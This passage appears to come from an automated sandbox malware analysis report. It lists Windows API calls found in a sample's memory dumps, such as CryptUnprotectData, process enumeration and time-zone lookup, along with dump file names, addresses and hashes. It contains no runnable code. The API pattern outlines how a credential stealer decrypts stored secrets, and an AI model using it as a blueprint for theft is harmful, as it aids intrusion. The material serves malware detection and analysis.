                                      • LocalFree.KERNEL32(?), ref: 00AC730E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      • Opcode ID: 0b51ac7388f1711fb7ff6456b16afc7c823a423f7044eed68f974fb8ee6d59d2
                                      • Instruction ID: 67877c3a492950d59e6cf69ad36b9eb053bb2668ac78d29ae5061843c5968147
                                      • Opcode Fuzzy Hash: 0b51ac7388f1711fb7ff6456b16afc7c823a423f7044eed68f974fb8ee6d59d2
                                      • Instruction Fuzzy Hash: F2010C75A54308BBDB10DFA4DC46F9E7778AB44B00F104549FB05EA3C0D6B0AA409B68
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AD97AE
                                      • Process32First.KERNEL32(00AE0ACE,00000128), ref: 00AD97C2
                                      • Process32Next.KERNEL32(00AE0ACE,00000128), ref: 00AD97D7
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 00AD97EC
                                      • CloseHandle.KERNEL32(00AE0ACE), ref: 00AD980A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 05bef2c4696d11c8b11423a20bb5945af9c1001297d5415510ade3afc958077f
                                      • Instruction ID: ef40a41445cb0a19aa73c10a229337823b76b59e21653c0ac074c8e1b707e07f
                                      • Opcode Fuzzy Hash: 05bef2c4696d11c8b11423a20bb5945af9c1001297d5415510ade3afc958077f
                                      • Instruction Fuzzy Hash: 12010C75A24308ABDB20DFA5CD44BDEB7B8BB49700F10458AE50AE6340D730DA40DF60
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: <7\h$huzx
                                      • API String ID: 0-2989614873
                                      • Opcode ID: 6a2fedf1c1bf9c089bc0f0beeff17475c0faabf16cfb0d707f554e65a8d74d49
                                      • Instruction ID: a53067729c79838696e828b65188dd4bb9ac62a2f626536dd73980df7a4aa215
                                      • Opcode Fuzzy Hash: 6a2fedf1c1bf9c089bc0f0beeff17475c0faabf16cfb0d707f554e65a8d74d49
                                      • Instruction Fuzzy Hash: AE63633281EBD41ECB27DB3297B61917F6ABE1361431D4ACEC4C18F4B3C6909A16E356
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: +KgO${Fg$~|/;$CCP$?r
                                      Strings
                                      • API ID:
                                      • String ID: <M_]$GES$WMg_$d
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,00AC51D4,40000001,00000000,00000000,?,00AC51D4), ref: 00AD9050
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AC4F3E,00000000,00000000), ref: 00ACA23F
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00AC4F3E,00000000,?), ref: 00ACA251
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AC4F3E,00000000,00000000), ref: 00ACA27A
                                      • LocalFree.KERNEL32(?,?,?,?,00AC4F3E,00000000,?), ref: 00ACA28F
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0154F020,00000000,?,00AE0DF8,00000000,?,00000000,00000000), ref: 00AD7BF3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD7BFA
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0154F020,00000000,?,00AE0DF8,00000000,?,00000000,00000000,?), ref: 00AD7C0D
                                      • wsprintfA.USER32 ref: 00AD7C47
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      Strings
                                      • API ID:
                                      • String ID: !{n%$-3\$=aBB
                                      APIs
                                      • CoCreateInstance.COMBASE(00ADE120,00000000,00000001,00ADE110,00000000), ref: 00AD39A8
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00AD3A00
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID:
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00ACA2D4
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00ACA2F3
                                      • LocalFree.KERNEL32(?), ref: 00ACA323
                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                      • String ID:
                                      Strings
                                      • API ID:
                                      • String ID: &io$27S
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ?$__ZN
                                      • API String ID: 0-1427190319
                                      • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction ID: 97e0b654ae89a60721e48161cafd849084aa448bc8104bac4196268995432b5e
                                      • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction Fuzzy Hash: BA7214B2908B509BD728CF14C89076AB7E2FFD5310F698A9DF8E55B291D370EC419B81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: the remaining .sdmp dumps of the 00AC0000 module image, the same list given in the first entry above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: [>/$z=D4
                                      • API String ID: 0-2343098861
                                      • Opcode ID: 6c41cb32a3b03ccd8a55bc727db445ca05ba6964c8dca05004677f7878848a2a
                                      • Instruction ID: 6eb49fc2df3b599c220861324e958ff95648ac55c8fb391acb48eb18b6a1ea18
                                      • Opcode Fuzzy Hash: 6c41cb32a3b03ccd8a55bc727db445ca05ba6964c8dca05004677f7878848a2a
                                      • Instruction Fuzzy Hash: 5C51F7F3A093045FE340796DDC4877AB7DADBD4720F2A853DE78483744E93948058296
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: the remaining .sdmp dumps of the 00AC0000 module image, the same list given in the first entry above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: xn--
                                      • API String ID: 0-2826155999
                                      • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                      • Instruction ID: a2497de2492fa0f9f4c33f3b5767162cab8b84c44c9a203ca44fbd9fa45962f5
                                      • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                      • Instruction Fuzzy Hash: 0CA204B2D042688AEF29CB68C8943EDBBF1EF45300F9842EAD4567B281D7755EC5CB50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: the remaining .sdmp dumps of the 00AC0000 module image, the same list given in the first entry above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                      • Instruction ID: 9cf6a21ac98ac2b317980d4afe269d678c32055080745186549f76829e0017bf
                                      • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                      • Instruction Fuzzy Hash: D3E1BE316083419FC725CE28C891BEEB7E2EFC9300F95496DE5D99B291D731A895CB82
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: the remaining .sdmp dumps of the 00AC0000 module image, the same list given in the first entry above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                      • Instruction ID: 63b498db9c57700308b6fbde4e57da01cf744c8bf0eca40404bac37d41da4c2f
                                      • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                      • Instruction Fuzzy Hash: 9CE1B231A083059FCB24CE18C8917EFB7E6EFC5310F95896DE9999B251DB30AC85CB46
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: the remaining .sdmp dumps of the 00AC0000 module image, the same list given in the first entry above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: UNC\
                                      • API String ID: 0-505053535
                                      • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                      • Instruction ID: c6c681cf2ee6b388beb6113dae93b9ae54063e7630b2bab76bc467838db938a3
                                      • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                      • Instruction Fuzzy Hash: A2E11771D042758EEB11CF1AD8843BEBBE2EB96314F1981E9C47C6B292C735CD468B90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: the remaining .sdmp dumps of the 00AC0000 module image, the same list given in the first entry above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: iJh
                                      • API String ID: 0-3731254789
                                      • Opcode ID: d96e4ed4a4488f32ec9c81fa8b30145f43ea3801037cf2ab54df3134625df901
                                      • Instruction ID: 2e6e1fd503f1837892b4a113544738a526c8112014e73471dd9e1db4ef5bcb43
                                      • Opcode Fuzzy Hash: d96e4ed4a4488f32ec9c81fa8b30145f43ea3801037cf2ab54df3134625df901
                                      • Instruction Fuzzy Hash: 3D51ACF3E082145BF3106D29ECC57AABBC6DBD4320F1B853DDAC897B48F97948058286
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: the remaining .sdmp dumps of the 00AC0000 module image, the same list given in the first entry above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: L>2k
                                      • API String ID: 0-3915586722
                                      • Opcode ID: 67ef48011475f0d996c10de37c684ffe1a06bb1b2cbd5e2c1de9fea3c06263fd
                                      • Instruction ID: 08072ade3aff8d0d8ff07ebe93722f493d734aa8691108076e7765beeb3973e6
                                      • Opcode Fuzzy Hash: 67ef48011475f0d996c10de37c684ffe1a06bb1b2cbd5e2c1de9fea3c06263fd
                                      • Instruction Fuzzy Hash: 9E5108F7A092109FE3006E5DDC8476AF7D6EF98720F1A853DEAC487744EA3958148693
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: the remaining .sdmp dumps of the 00AC0000 module image, the same list given in the first entry above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                      • Instruction ID: b1ce97e10d19f8deb91a778f3d2b2f9b671b0547b8431851d9720a2502b69de8
                                      • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                      • Instruction Fuzzy Hash: E782E275A00F448FD765CF2AC880B92B7F1BF5A300F548A2EE9EA9B651DB30B545CB50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: the remaining .sdmp dumps of the 00AC0000 module image, the same list given in the first entry above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                      • Instruction ID: 7bf8cac8b6f5d3411200689a2a4863282642b048bd3e50cd1027f9bc6f4d8e8f
                                      • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                      • Instruction Fuzzy Hash: E4427D706047418FD7298F19C494666FFE2FF99310F288AEED4868B7D2D636E885CB50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                      • Instruction ID: 5ab68c650e2935ffb5e6b878a548e4be6008c496bfd62cdc02babb87f6e86ca1
                                      • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                      • Instruction Fuzzy Hash: 5E02F671E002168FCB15CF29C890AAFB7E2EFDA340F35836AE955B7251D770AD428790
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                      • Instruction ID: 79e80756d57b41c103a04be20658219caffa54508307795b956f79ca64adf92d
                                      • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                      • Instruction Fuzzy Hash: 98022171A083858FCB14CF29D8903A9B7E1EFA5340F98876DEC999B352D331E9C58B41
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96c9d595f8ac80b1053a22c5483020b82e79aa46733f9f92afced2c4fd0fca02
                                      • Instruction ID: bd0211b5a49c67f7316cebfc024634a20ade3324009503b2f332ab8d18830d7e
                                      • Opcode Fuzzy Hash: 96c9d595f8ac80b1053a22c5483020b82e79aa46733f9f92afced2c4fd0fca02
                                      • Instruction Fuzzy Hash: A5E118F3A0C6009FE3086E2CDC4576AB7E6EF94720F1A493DEAC5D7744EA3598048796
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
